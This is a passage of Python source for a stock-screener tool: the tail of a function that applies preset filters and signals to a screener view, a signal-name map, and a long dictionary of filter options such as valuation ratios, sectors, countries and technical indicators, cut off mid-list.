    d_filters = {k: v for k, v in d_filters.items() if v}

    # Dispatch table replaces the original if/elif chain.
    screener_classes = {
        "overview": overview.Overview,
        "valuation": valuation.Valuation,
        "financial": financial.Financial,
        "ownership": ownership.Ownership,
        "performance": performance.Performance,
        "technical": technical.Technical,
    }
    if data_type not in screener_classes:
        print("Invalid selected screener type")
        return pd.DataFrame()
    screen = screener_classes[data_type]()

    # An explicit signal argument overrides any preset-level Signal.
    if signal:
        screen.set_filter(signal=d_signals[signal])
    elif "Signal" in d_general:
        screen.set_filter(filters_dict=d_filters, signal=d_general["Signal"])
    else:
        screen.set_filter(filters_dict=d_filters)

    # Assemble ScreenerView keyword arguments instead of branching four ways.
    view_kwargs = {"ascend": ascend}
    if "Order" in d_general:
        view_kwargs["order"] = d_general["Order"]
    if limit > 0:
        view_kwargs["limit"] = limit
    return screen.ScreenerView(**view_kwargs)
# Maps CLI-style signal argument names to the display names that
# get_screener_data passes to screen.set_filter(signal=...).
d_signals = {
    "top_gainers": "Top Gainers",
    "top_losers": "Top Losers",
    "new_high": "New High",
    "new_low": "New Low",
    "most_volatile": "Most Volatile",
    "most_active": "Most Active",
    "unusual_volume": "Unusual Volume",
    "overbought": "Overbought",
    "oversold": "Oversold",
    "downgrades": "Downgrades",
    "upgrades": "Upgrades",
    "earnings_before": "Earnings Before",
    "earnings_after": "Earnings After",
    "recent_insider_buying": "Recent Insider Buying",
    "recent_insider_selling": "Recent Insider Selling",
    "major_news": "Major News",
    "horizontal_sr": "Horizontal S/R",
    "tl_resistance": "TL Resistance",
    "tl_support": "TL Support",
    "wedge_up": "Wedge Up",
    "wedge_down": "Wedge Down",
    "wedge": "Wedge",
    "triangle_ascending": "Triangle Ascending",
    "triangle_descending": "Triangle Descending",
    "channel_up": "Channel Up",
    "channel_down": "Channel Down",
    "channel": "Channel",
    "double_top": "Double Top",
    "double_bottom": "Double Bottom",
    "multiple_top": "Multiple Top",
    "multiple_bottom": "Multiple Bottom",
    "head_shoulders": "Head & Shoulders",
    "head_shoulders_inverse": "Head & Shoulders Inverse",
}
d_check_screener = {
"Order": [
"Any",
"Signal",
"Ticker",
"Company",
"Sector",
"Industry",
"Country",
"Market Cap.",
"Price/Earnings",
"Forward Price/Earnings",
"PEG (Price/Earnings/Growth)",
"Price/Sales",
"Price/Book",
"Price/Cash",
"Price/Free Cash Flow",
"Dividend Yield",
"Payout Ratio",
"EPS(ttm)",
"EPS growth this year",
"EPS growth next year",
"EPS growth past 5 years",
"EPS growth next 5 years",
"Sales growth past 5 years",
"EPS growth qtr over qtr",
"Sales growth qtr over qtr",
"Shares Outstanding",
"Shares Float",
"Insider Ownership",
"Insider Transactions",
"Institutional Ownership",
"Institutional Transactions",
"Short Interest Share",
"Short Interest Ratio",
"Earnings Date",
"Return on Assets",
"Return on Equity",
"Return on Investment",
"Current Ratio",
"Quick Ratio",
"LT Debt/Equity",
"Total Debt/Equity",
"Gross Margin",
"Operating Margin",
"Net Profit Margin",
"Analyst Recommendation",
"Performance (Week)",
"Performance (Month)",
"Performance (Quarter)",
"Performance (Half Year)",
"Performance (Year)",
"Performance (Year To Date)",
"Beta",
"Average True Range",
"Volatility (Week)",
"Volatility (Month)",
"20-Day SMA (Relative)",
"50-Day SMA (Relative)",
"200-Day SMA (Relative)",
"50-Day High (Relative)",
"50-Day Low (Relative)",
"52-Week High (Relative)",
"52-Week Low (Relative)",
"Relative Strength Index (14)",
"Average Volume (3 Month)",
"Relative Volume",
"Change",
"Change from Open",
"Gap",
"Volume",
"Price",
"Target Price",
"IPO Date",
],
"Signal": [
"Any",
"Top Gainers",
"Top Losers",
"New High",
"New Low",
"Most Volatile",
"Most Active",
"Unusual Volume",
"Overbought",
"Oversold",
"Downgrades",
"Upgrades",
"Earnings Before",
"Earnings After",
"Recent Insider Buying",
"Recent Insider Selling",
"Major News",
"Horizontal S/R",
"TL Resistance",
"TL Support",
"Wedge Up",
"Wedge Down",
"Triangle Ascending",
"Triangle Descending",
"Wedge",
"Channel Up",
"Channel Down",
"Channel",
"Double Top",
"Double Bottom",
"Multiple Top",
"Multiple Bottom",
"Head & Shoulders",
"Head & Shoulders Inverse",
],
"Exchange": ["Any", "AMEX", "NASDAQ", "NYSE"],
"Market Cap.": [
"Any",
"Mega ($200bln and more)",
"Large ($10bln to $200bln)",
"Mid ($2bl to $10bln)",
"Small ($300mln to $2bln)",
"Micro ($50mln to $300mln)",
"Nano (under $50mln)",
"+Large (over $50mln)",
"+Mid (over $2bln)",
"+Small (over $300mln)",
"+Micro (over $50mln)",
"-Large (under $200bln)",
"-Mid (under $10bln)",
"-Small (under $2bln)",
"-Micro (under $300mln)",
],
"Earnings Date": [
"Any",
"Today",
"Today Before Market Open",
"Today Before Market Close",
"Tomorrow",
"Tomorrow Before Market Open",
"Tomorrow Before Market Close",
"Yesterday",
"Yesterday Before Market Open",
"Yesterday Before Market Close",
"Next 5 Days",
"Previous 5 Days",
"This Week",
"Next Week",
"Previous Week",
"This Month",
],
"Target Price": [
"Any",
"50% Above Price",
"40% Above Price",
"30% Above Price",
"20% Above Price",
"10% Above Price",
"5% Above Price",
"Above Price",
"Below Price",
"5% Below Price",
"10% Below Price",
"20% Below Price",
"30% Below Price",
"40% Below Price",
"50% Below Price",
],
"Index": ["Any", "S&P 500", "DJIA"],
"Dividend Yield": [
"Any",
"None (0%)",
"Positive (>0%)",
"High (>5%)",
"Very High (>10%)",
"Over 1%",
"Over 2%",
"Over 3%",
"Over 4%",
"Over 5%",
"Over 6%",
"Over 7%",
"Over 8%",
"Over 9%",
"Over 10%",
],
"Average Volume": [
"Any",
"Under 50K",
"Under 100K",
"Under 500K",
"Under 750K",
"Under 1M",
"Over 50K",
"Over 100K",
"Over 200K",
"Over 300K",
"Over 400K",
"Over 500K",
"Over 750K",
"Over 1M",
"Over 2M",
"100K to 500K",
"100K to 1M",
"500K to 1M",
"500K to 10M",
],
"IPO Date": [
"Any",
"Today",
"Yesterday",
"In the last week",
"In the last month",
"In the last quarter",
"In the last year",
"In the last 2 years",
"In the last 3 years",
"In the last 5 years",
"More than a year ago",
"More that 5 years ago",
"More than 10 years ago",
"More than 15 years ago",
"More than 20 years ago",
"More than 25 years ago",
],
"Sector": [
"Any",
"Basic Materials",
"Communication Services",
"Consumer Cyclical",
"Consumer Defensive",
"Energy",
"Financial",
"Healthcare",
"Industrials",
"Real Estate",
"Technology",
"Utilities",
],
"Float Short": [
"Any",
"Low (<5%)",
"High(>20%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"Relative Volume": [
"Any",
"Over 10",
"Over 5",
"Over 3",
"Over 2",
"Over 1.5",
"Over 1",
"Over 0.75",
"Over 0.5",
"Over 0.25",
"Under 2",
"Under 1",
"Under 1.5",
"Under 1",
"Under 0.75",
"Under 0.5",
"Under 0.25",
"Under 0.1",
],
"Shares Outstanding": [
"Any",
"Under 1M",
"Under 5M",
"Under 10M",
"Under 20M",
"Under 50M",
"Under 100M",
"Over 1M",
"Over 2M",
"Over 5M",
"Over 10M",
"Over 20M",
"Over 50M",
"Over 100M",
"Over 200M",
"Over 500M",
"Over 1000M",
],
"Industry": [
"Any",
"Agricultural Inputs",
"Aluminium",
"Building Materials",
"Chemicals",
"Coking Coal",
"Copper",
"Gold",
"Lumber & Wood Production",
"Other Industrial Metals & Mining",
"Other Precious Metals & Mining",
"Paper & Paper Products",
"Silver",
"Specialty Chemicals",
"Steel",
],
"Analyst Recom.": [
"Any",
"Strong Buy (1)",
"Buy or better",
"Buy",
"Hold or better",
"Hold",
"Hold or worse",
"Sell",
"Sell or worse",
"Strong Sell (5)",
],
"Current Volume": [
"Any",
"Under 100K",
"Under 500K",
"Under 750K",
"Under 1M",
"Over 0",
"Over 50K",
"Over 100K",
"Over 200K",
"Over 300K",
"Over 400K",
"Over 500K",
"Over 750K",
"Over 1M",
"Over 2M",
"Over 5M",
"Over 10M",
"Over 20M",
],
"Float": [
"Any",
"Under 1M",
"Under 5M",
"Under 10M",
"Under 20M",
"Under 50M",
"Under 100M",
"Over 1M",
"Over 2M",
"Over 5M",
"Over 10M",
"Over 20M",
"Over 50M",
"Over 100M",
"Over 200M",
"Over 500M",
"Over 1000M",
],
"Country": [
"Any",
"Asia",
"Europe",
"Latin America",
"BRIC",
"Argentina",
"Australia",
"Bahamas",
"Belgium",
"BeNeLux",
"Bermuda",
"Brazil",
"Canada",
"Cayman Islands",
"Chile",
"China",
"China & Hong Kong",
"Colombia",
"Cyprus",
"Denmark",
"Finland",
"France",
"Germany",
"Greece",
"Hong Kong",
"Hungary",
"Iceland",
"Iceland",
"India",
"Indonesia",
"Ireland",
"Israel",
"Italy",
"Japan",
"Kazakhstan",
"Luxembourg",
"Malaysia",
"Malta",
"Mexico",
"Monaco",
"Netherlands",
"New Zealand",
"Norway",
"Panama",
"Peru",
"Philippines",
"Portugal",
"Russia",
"Singapore",
"South Africa",
"South Korea",
"Spain",
"Sweden",
"Switzerland",
"Taiwan",
"Turkey",
"United Arab Emirates",
"United Kingdom",
"Uruguay",
"USA",
"Foreign (ex-USA)",
],
"Option/Short": ["Any", "Optionable", "Shortable", "Optionable and shortable"],
"Price": [
"Any",
"Under $1",
"Under $2",
"Under $3",
"Under $4",
"Under $5",
"Under $7",
"Under $10",
"Under $15",
"Under $20",
"Under $30",
"Under $40",
"Under $50",
"Over $1",
"Over $2",
"Over $3",
"Over $4",
"Over $5",
"Over $7",
"Over $10",
"Over $15",
"Over $20",
"Over $30",
"Over $40",
"Over $50",
"Over $60",
"Over $70",
"Over $80",
"Over $90",
"Over $100",
"$1 to $5",
"$1 to $10",
"$1 to $20",
"$5 to %10",
"$5 to $20",
"$5 to $50",
"$10 to $20",
"$10 to $50",
"$20 to $50",
"$50 to $100",
],
"P/E": [
"Any",
"Low (<15)",
"Profitable (>0)",
"High (>50)",
"Under 5",
"Under 10",
"Under 15",
"Under 20",
"Under 25",
"Under 30",
"Under 35",
"Under 40",
"Under 45",
"Under 50",
"Over 5",
"Over 10",
"Over 15",
"Over 25",
"Over 30",
"Over 35",
"Over 40",
"Over 45",
"Over 50",
],
"Price/Cash": [
"Any",
"Low (<3)",
"High (>50)",
"Under 1",
"Under 2",
"Under 3",
"Under 4",
"Under 5",
"Under 6",
"Under 7",
"Under 8",
"Under 9",
"Under 10",
"Over 1",
"Over 2",
"Over 3",
"Over 4",
"Over 5",
"Over 6",
"Over 7",
"Over 8",
"Over 9",
"Over 10",
"Over 20",
"Over 30",
"Over 40",
"Over 50",
],
"EPS growthnext 5 years": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Positive Low (<10%)",
"High (>25%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"Return on Equity": [
"Any",
"Positive (>0%)",
"Negative (<0%)",
"Very Positive (>30%)",
"Very Negative (<-15%)",
"Under -50%",
"Under -40%",
"Under -35%",
"Under -30%",
"Under -25%",
"Under -20%",
"Under -15%",
"Under -10%",
"Under -5%",
"Over +50%",
"Over +45%",
"Over +40%",
"Over +35%",
"Over +30%",
"Over +25%",
"Over +20%",
"Over +15%",
"Over +10%",
"Over +5%",
],
"Debt/Equity": [
"Any",
"High (>0.5)",
"Low (<0.1)",
"Under 1",
"Under 0.9",
"Under 0.8",
"Under 0.7",
"Under 0.6",
"Under 0.5",
"Under 0.4",
"Under 0.3",
"Under 0.2",
"Under 0.1",
"Over 0.1",
"Over 0.2",
"Over 0.3",
"Over 0.4",
"Over 0.5",
"Over 0.6",
"Over 0.7",
"Over 0.8",
"Over 0.9",
"Over 1",
],
"InsiderOwnership": [
"Any",
"Low (<5%)",
"High (>30%)",
"Very High (>50%)",
"Over 10%",
"Over 20%",
"Over 30%",
"Over 40%",
"Over 50%",
"Over 60%",
"Over 70%",
"Over 80%",
"Over 90%",
],
"Forward P/E": [
"Any",
"Low (<15)",
"Profitable (>0)",
"High (>50)",
"Under 5",
"Under 10",
"Under 15",
"Under 20",
"Under 25",
"Under 30",
"Under 35",
"Under 40",
"Under 45",
"Under 50",
"Over 5",
"Over 10",
"Over 15",
"Over 20",
"Over 25",
"Over 30",
"Over 35",
"Over 40",
"Over 45",
"Over 50",
],
"Price/Free Cash Flow": [
"Any",
"Low (<15)",
"High (>50)",
"Under 5",
"Under 10",
"Under 15",
"Under 20",
"Under 25",
"Under 30",
"Under 35",
"Under 40",
"Under 45",
"Under 50",
"Under 60",
"Under 70",
"Under 80",
"Under 90",
"Under 100",
"Over 5",
"Over 10",
"Over 15",
"Over 20",
"Over 25",
"Over 30",
"Over 35",
"Over 40",
"Over 45",
"Over 50",
"Over 60",
"Over 70",
"Over 80",
"Over 90",
"Over 100",
],
"Sales growthpast 5 years": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Positive Low (0-10%)",
"High (>25%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"Return on Investment": [
"Any",
"Positive (>0%)",
"Negative (<0%)",
"Very Positive (>25%)",
"Very Negative (<-10%)",
"Under -50%",
"Under -45%",
"Under -40%",
"Under -35%",
"Under -30%",
"Under -25%",
"Under -20%",
"Under -15%",
"Under -10%",
"Under -5%",
"Over +5%",
"Over +10%",
"Over +15%",
"Over +20%",
"Over +25%",
"Over +30%",
"Over +35%",
"Over +40%",
"Over +45%",
"Over +50%",
],
"Gross Margin": [
"Any",
"Positive (>0%)",
"Negative (<0%)",
"High (>50%)",
"Under 90%",
"Under 80%",
"Under 70%",
"Under 60%",
"Under 50%",
"Under 45%",
"Under 40%",
"Under 35%",
"Under 30%",
"Under 25%",
"Under 20%",
"Under 15%",
"Under 10%",
"Under 5%",
"Under 0%",
"Under -10%",
"Under -20%",
"Under -30%",
"Under -50%",
"Under -70%",
"Under -100%",
"Over 0%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
"Over 40%",
"Over 45%",
"Over 50%",
"Over 60%",
"Over 70%",
"Over 80%",
"Over 90%",
],
"InsiderTransactions": [
"Any",
"Very Negative (<20%)",
"Negative (<0%)",
"Positive (>0%)",
"Very Positive (>20%)",
"Under -90%",
"Under 80%",
"Under 70%",
"Under -60%",
"Under -50%",
"Under -45%",
"Under 40%",
"Under -35%",
"Under -30%",
"Under -25%",
"Under -20%",
"Under -15%",
"Under -10%",
"Under -5%",
"Over +5%",
"Over +10%",
"Over +15%",
"Over +20%",
"Over +25%",
"Over +30%",
"Over +35%",
"Over +40%",
"Over +45%",
"Over +50%",
"Over +60%",
"Over +70%",
"Over +80%",
"Over +90%",
],
"PEG": [
"Any",
"Low (<1)",
"High (>2)",
"Under 1",
"Under 2",
"Under 3",
"Over 1",
"Over 2",
"Over 3",
],
"EPS growththis year": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Positive Low (0-10%)",
"High (>25%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"EPS growthqtr over qtr": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Positive Low (0-10%)",
"High (>25%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"Current Ratio": [
"Any",
"High (>3)",
"Low (<1)",
"Under 1",
"Under 0.5",
"Over 0.5",
"Over 1",
"Over 1.5",
"Over 2",
"Over 3",
"Over 4",
"Over 5",
"Over 10",
],
"Operating Margin": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Very Negative (<-20%)",
"High (>25%)",
"Under 90%",
"Under 80%",
"Under 70%",
"Under 60%",
"Under 50%",
"Under 45%",
"Under 40%",
"Under 35%",
"Under 30%",
"Under 25%",
"Under 20%",
"Under 15%",
"Under 10%",
"Under 5%",
"Under 0%",
"Under -10%",
"Under -20%",
"Under -30%",
"Under -50%",
"Under -70%",
"Under -100%",
"Over 0%",
"Over 10%",
"Under 15%",
"Over 20%",
"Over 25%",
"Over 30%",
"Over 35%",
"Over 40%",
"Over 45%",
"Over 50%",
"Over 60%",
"Over 70%",
"Over 80%",
"Over 90%",
],
"InstitutionalOwnership": [
"Any",
"Low (<5%)",
"High (>90%)",
"Under 90%",
"Under 80%",
"Under 70%",
"Under 60%",
"Under 50%",
"Under 40%",
"Under 30%",
"Under 20%",
"Under 10%",
"Over 10%",
"Over 20%",
"Over 30%",
"Over 40%",
"Over 50%",
"Over 60%",
"Over 70%",
"Over 80%",
"Over 90%",
],
"P/S": [
"Any",
"Low (<1)",
"High (>10)",
"Under 1",
"Under 2",
"Under 3",
"Under 4",
"Under 5",
"Under 6",
"Under 7",
"Under 8",
"Under 9",
"Under 10",
"Over 1",
"Over 2",
"Over 3",
"Over 4",
"Over 5",
"Over 6",
"Over 6",
"Over 7",
"Over 8",
"Over 9",
"Over 10",
],
"EPS growthnext year": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Positive Low (0-10%)",
"High (>25%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"Sales growthqtr over qtr": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Positive Low (0-10%)",
"High (>25%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"Quick Ratio": [
"Any",
"High (>3)",
"Low (<0.5)",
"Under 1",
"Under 0.5",
"Over 0.5",
"Over 1",
"Over 1.5",
"Over 2",
"Over 3",
"Over 4",
"Over 5",
"Over 10",
],
"Net Profit Margin": [
"Any",
"Positive (>0%)",
"Negative (<0%)",
"Very Negative (<-20%)",
"High (>20%)",
"Under 90%",
"Under 80%",
"Under 70%",
"Under 60%",
"Under 50%",
"Under 45%",
"Under 40%",
"Under 35%",
"Under 30%",
"Under 25%",
"Under 20%",
"Under 15%",
"Under 10%",
"Under 5%",
"Under 0%",
"Under -10%",
"Under -20%",
"Under -30%",
"Under -50%",
"Under -70%",
"Under -100%",
"Over 0%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
"Over 35%",
"Over 40%",
"Over 45%",
"Over 50%",
"Over 60%",
"Over 70%",
"Over 80%",
"Over 90%",
],
"InstitutionalTransactions": [
"Any",
"Very Negative (<20%)",
"Negative (<0%)",
"Positive (>0%)",
"Very Positive (>20%)",
"Under -50%",
"Under -45%",
"Under -40%",
"Under -35%",
"Under -30%",
"Under -25%",
"Under -20%",
"Under -15%",
"Under -10%",
"Under -5%",
"Over +5%",
"Over +10%",
"Over +15%",
"Over +20%",
"Over +25%",
"Over +30%",
"Over +35%",
"Over +40%",
"Over +45%",
"Over +50%",
],
"P/B": [
"Any",
"Low (<1)",
"High (>5)",
"Under 1",
"Under 2",
"Under 3",
"Under 4",
"Under 5",
"Under 6",
"Under 7",
"Under 8",
"Under 9",
"Under 10",
"Over 1",
"Over 2",
"Over 3",
"Over 4",
"Over 5",
"Over 6",
"Over 7",
"Over 8",
"Over 9",
"Over 10",
],
"EPS growthpast 5 years": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Positive Low (0-10%)",
"High (>25%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"Return on Assets": [
"Any",
"Positive (>0%)",
"Negative (<0%)",
"Very Positive (>15%)",
"Very Negative (<-15%)",
"Under -50%",
"Under -45%",
"Under -40%",
"Under -35%",
"Under -30%",
"Under -25%",
"Under -20%",
"Under -15%",
"Under -10%",
"Under -5%",
"Over +5%",
"Over +10%",
"Over +15%",
"Over +20%",
"Over +25%",
"Over +30%",
"Over +35%",
"Over +40%",
"Over +45%",
"Over +50%",
],
"LT Debt/Equity": [
"Any",
"High (>0.5)",
"Low (<0.1)",
"Under 1",
"Under 0.9",
"Under 0.8",
"Under 0.7",
"Under 0.6",
"Under 0.5",
"Under 0.4",
"Under 0.3",
"Under 0.2",
"Under 0.1",
"Over 0.1",
"Over 0.2",
"Over 0.3",
"Over 0.4",
"Over.5",
"Over 0.6",
"Over 0.7",
"Over 0.8",
"Over 0.9",
"Over 1",
],
"Payout Ratio": [
"Any",
"None (0%)",
"Positive (>0%)",
"Low (<20%)",
"High (>50%)",
"Over 0%",
"Over 10%",
"Over 20%",
"Over 30%",
"Over 40%",
"Over 50%",
"Over 60%",
"Over 70%",
"Over 80%",
"Over 90%",
"Over 100%",
"Under 10%",
"Under 20%",
"Under 30%",
"Under 40%",
"Under 50%",
"Under 60%",
"Under 70%",
"Under 80%",
"Under 90%",
"Under 100%",
],
"Performance": [
"Any",
"Today Up",
"Today Down",
"Today -15%",
"Today -10%",
"Today -5%",
"Today +5%",
"Today +10%",
"Today +15%",
"Week -30%",
"Week -20%",
"Week -10%",
"Week Down",
"Week Up",
"Week +10%",
"Week +20%",
"Week +30%",
"Month -50%",
"Month -30%",
"Month -20%",
"Month -10%",
"Month Down",
"Month Up",
"Month +10%",
"Month +20%",
"Month +30%",
"Month +50%",
"Quarter -50%",
"Quarter -30%",
"Quarter -20%",
"Quarter -10%",
"Quarter Down",
"Quarter Up",
"Quarter +10%",
"Quarter +20%",
"Quarter +30%",
"Quarter +50%",
"Half -75%",
"Half -50%",
"Half -30%",
"Half -20%",
"Half -10%",
"Half Down",
"Half Up",
"Half +10%",
"Half +20%",
"Half +30%",
"Half +50%",
"Half +100%",
"Year -75%",
"Year -50%",
"Year -30%",
"Year -20%",
"Year -10%",
"Year Down",
"Year Up",
"Year +10%",
"Year +20%",
"Year +30%",
"Year +50%",
"Year +100%",
"Year +200%",
"Year +300%",
"Year +500%",
"YTD -75%",
"YTD -50%",
"YTD -30%",
"YTD -20%",
"YTD -10%",
"YTD -5%",
"YTD Down",
"YTD Up",
"YTD +5%",
"YTD +10%",
"YTD +20%",
"YTD +30",
"YTD +50%",
"YTD +100%",
],
"20-Day Simple Moving Average": [
"Any",
"Price below SMA20",
"Price 10% below SMA20",
"Price 20% below SMA20",
"Price 30% below SMA20",
"Price 40% below SMA20",
"Price 50% below SMA20",
"Price above SMA20",
"Price 10% above SMA20",
"Price 20% above SMA20",
"Price 30% above SMA20",
"Price 40% above SMA20",
"Price 50% above SMA20",
"Price crossed SMA20",
"Price crossed SMA20 above",
"Price crossed SMA20 below",
"SMA20 crossed SMA50",
"SMA20 crossed SMA50 above",
"SMA20 crossed SMA50 below",
"SMA20 cross SMA200",
"SMA20 crossed SMA200 below",
"SMA20 crossed SMA200 above",
"SMA20 above SMA50",
"SMA20 below SMA50",
"SMA20 above SMA200",
"SMA20 below SMA200",
],
"20-Day High/Low": [
"Any",
"New High",
"New Low",
"5% or more below High",
"10% or more below High",
"15% or more below High",
"20% or more below High",
"30% or more below High",
"40% or more below High",
"50% or more below High",
"0-3% below High",
"0-5% below High",
"0-10% below High",
"5% or more above Low",
"10% or more above Low",
"15% or more above Low",
"20% or more above Low",
"30% or more above Low",
"40% or more above Low",
"50% or more above Low",
"0-3% above Low",
"0-5% above Low",
"0-10% above Low",
],
"Beta": [
"Any",
"Under 0",
"Under 0.5",
"Under 1",
"Under 1.5",
"Under 2",
"Over 0",
"Over 0.5",
"Over 1",
"Over 1.5",
"Over 2",
"Over 2.5",
"Over 3",
"Over 4",
"0 to 0.5",
"0 to 1",
"0.5 to 1",
"0.5 to 1.5",
"1 to 1.5",
"1 to 2",
],
"Performance 2": [
"Any",
"Today Up",
"Today Down",
"Today -15%",
"Today -10%",
"Today -5%",
"Today +5%",
"Today +10%",
"Today +15%",
"Week -30%",
"Week -20%",
"Week -10%",
"Week Down",
"Week Up",
"Week +10%",
"Week +20%",
"Week +30%",
"Month -50%",
"Month -30%",
"Month -20%",
"Month -10%",
"Month Down",
"Month Up",
"Month +10%",
"Month +20%",
"Month +30%",
"Month +50%",
"Quarter -50%",
"Quarter -30%",
"Quarter -20%",
"Quarter -10%",
"Quarter Down",
"Quarter Up",
"Quarter +10%",
"Quarter +20%",
"Quarter +30%",
"Quarter +50%",
"Half -75%",
"Half -50%",
"Half -30%",
"Half -20%",
"Half -10%",
"Half Down",
"Half Up",
"Half +10%",
"Half +20%",
"Half +30%",
"Half +50%",
"Half +100%",
"Year -75%",
"Year -50%",
"Year -30%",
"Year -20%",
"Year -10%",
"Year Down",
"Year Up",
"Year +10%",
"Year +20%",
"Year +30%",
"Year +50%",
"Year +100%",
"Year +200%",
"Year +300%",
"Year +500%",
"YTD -75%",
"YTD -50%",
"YTD -30%",
"YTD -20%",
"YTD -10%",
"YTD -5%",
"YTD Down",
"YTD Up",
"YTD +5%",
"YTD +10%",
"YTD +20%",
"YTD +30",
"YTD +50%",
"YTD +100%",
],
"50-Day Simple Moving Average": [
"Any",
"Price below SMA50",
"Price 10% below SMA50",
"Price 20% below SMA50",
"Price 30% below SMA50",
"Price 40% below SMA50",
"Price 50% below SMA50",
"Price above SMA50",
"Price 10% above SMA50",
"Price 20% above SMA50",
"Price 30% above SMA50",
"Price 40% above SMA50",
"Price 50% above SMA50",
"Price crossed SMA50",
"Price crossed SMA50 above",
"Price crossed SMA50 below",
"SMA50 crossed SMA20",
"SMA50 crossed SMA20 above",
"SMA50 crossed SMA20 below",
"SMA50 cross SMA200",
"SMA50 crossed SMA200 below",
"SMA50 crossed SMA200 above",
"SMA50 above SMA20",
"SMA50 below SMA20",
"SMA50 above SMA200",
"SMA50 below SMA200",
],
"50-Day High/Low": [
"Any",
"New High",
"New Low",
"5% or more below High",
"10% or more below High",
"15% or more below High",
"20% or more below High",
"30% or more below High",
"40% or more below High",
"50% or more below High",
"0-3% below High",
"0-5% below High",
"0-10% below High",
"5% or more above Low",
"10% or more above Low",
"15% or more above Low",
"20% or more above Low",
"30% or more above Low",
"40% or more above Low",
"50% or more above Low",
"0-3% above Low",
"0-5% above Low",
"0-10% above Low",
],
"Average True Range": [
"Any",
"Over 0.25",
"Over 0.5",
"Over 0.75",
"Over 1",
"Over 1.5",
"Over 2. Over 2.5",
"Over 3",
"Over 3.5",
"Over 4",
"Over 4.5",
"Over 5",
"Under 0.25",
"Under 0.5",
"Under 0.75",
"Under 1",
"Under 1.5",
"Under 2",
"Under 2.5",
"Under 3",
"Under 3.5",
"Under 4",
"Under 4.5",
"Under 5",
],
"Volatility": [
"Any",
"Week - Over 3%",
"Week - Over 4%",
"Week - Over 5%",
"Week - 6%",
"Week - 7%",
"Week - 8%",
"Week - 9%",
"Week - 10%",
"Week - 12%",
"Week - 15%",
"Month - 2%",
"Month - 3%",
"Month - 4%",
"Month 5%",
"Month 5%",
"Month 6%",
"Month 7%",
"Month 8%",
"Month 9%",
"Month 10%",
"Month 12%",
"Month 15%",
],
"200-Day Simple Moving Average": [
"Any",
"Price below SMA200",
"Price 10% below SMA200",
"Price 20% below SMA200",
"Price 30% below SMA200",
"Price 40% below SMA200",
"Price 50% below SMA200",
"Price above SMA200",
"Price 10% above SMA200",
"Price 20% above SMA200",
"Price 30% above SMA200",
"Price 40% above SMA200",
"Price 50% above SMA200",
"Price crossed SMA200",
"Price crossed SMA200 above",
"Price crossed SMA200 below",
"SMA200 crossed SMA20",
"SMA20 crossed SMA20 above",
"SMA20 crossed SMA20 below",
"SMA200 cross SMA50",
"SMA200 crossed SMA50 below",
"SMA200 crossed SMA50 above",
"SMA200 above SMA20",
"SMA200 below SMA20",
"SMA200 above SMA50",
"SMA200 below SMA50",
],
"52-Week High/Low": [
"Any",
"New High",
"New Low",
"5% or more below High",
"10% or more below High",
"15% or more below High",
"20% or more below High",
"30% or more below High",
"40% or more below High",
"50% or more below High",
"0-3% below High",
"0-5% below High",
"0-10% below High",
"5% or more above Low",
"10% or more above Low",
"15% or more above Low",
"20% or more above Low",
"30% or more above Low",
"40% or more above Low",
"50% or more above Low",
"0-3% above Low",
"0-5% above Low",
"0-10% above Low",
],
"RSI (14)": [
"Any",
"Overbought (90)",
"Overbought (80)",
"Overbought (70)",
"Overbought (6)",
"Oversold (40)",
"Oversold (30)",
"Oversold (20)",
"Oversold (10)",
"Not Overbought (<60)",
"Not Overbought (<50)",
"Not Oversold (>50)",
"Not Oversold (>40)",
],
"Change": [
"Any",
"Up",
"Up 1%",
"Up 2%",
"Up 3%",
"Up 4%",
"Up 5%",
"Up 6%",
"Up 7%",
"Up 8%",
"Up 9%",
"Up 10%",
"Up 15%",
"Up 20%",
"Down",
"Down 1%",
"Down 2%",
"Down 3%",
"Down 4%",
"Down 5%",
"Down 6%",
"Down 7%",
"Down 8%",
"Down 9%",
"Down 10%",
"Down 15%",
"Down 20%",
],
"Pattern": [
"Any",
"Horizontal S/R",
"Horizontal S/R (Strong)",
"TL Resistance",
"TL Resistance (Strong)",
"TL Support",
"TL Support (Strong)",
"Wedge Up",
"Wedge Up (Strong)",
"Wedge Down",
"Wedge Down (Strong)",
"Triangle Ascending",
"Triangle Ascending (Strong)",
"Triangle Descending",
"Triangle Descending (Strong)",
"Wedge",
"Wedge (Strong)",
"Channel Up",
"Channel Up (Strong)",
"Channel Down",
